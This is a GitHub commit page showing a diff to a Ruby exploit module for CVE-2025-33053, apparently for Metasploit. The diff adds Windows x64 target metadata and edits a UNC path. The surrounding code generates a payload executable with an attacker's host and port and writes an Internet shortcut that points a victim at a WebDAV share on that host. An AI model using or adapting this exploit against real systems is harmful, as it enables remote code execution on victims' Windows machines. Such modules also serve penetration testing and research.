Skip to content

Commit 9e5dd09

Browse files
committed
Add some features and delete old files for CVE-2025-33053 exploit module
1 parent 7ad7c62 commit 9e5dd09

File tree

1 file changed

+8
-2
lines changed

1 file changed

+8
-2
lines changed

modules/exploits/windows/fileformat/cve_2025_33053.rb

Lines changed: 8 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -17,7 +17,13 @@ def initialize(info = {})
1717
'References' => [
1818
['CVE', '2025-33053'],
1919
['URL', 'https://github.com/DevBuiHieu/CVE-2025-33053-Proof-Of-Concept']
20-
]
20+
],
21+
'Platform' => 'win',
22+
'Arch' => ARCH_X64,
23+
'Targets' => [
24+
['Windows (generic)', {}]
25+
],
26+
'DefaultTarget' => 0
2127
))
2228

2329
register_options(
@@ -54,7 +60,7 @@ def run
5460
generate_payload_exe(payload_type, lhost, lport, exe_path)
5561
end
5662

57-
unc_path = "\\\\#{lhost}\\#{File.basename(webdav_dir)}\\"
63+
unc_path = "\\#{lhost}\\#{File.basename(webdav_dir)}\\"
5864
url_content = <<~EOF
5965
[InternetShortcut]
6066
URL=#{datastore['LOLBAS_EXE']}

0 commit comments

Comments
 (0)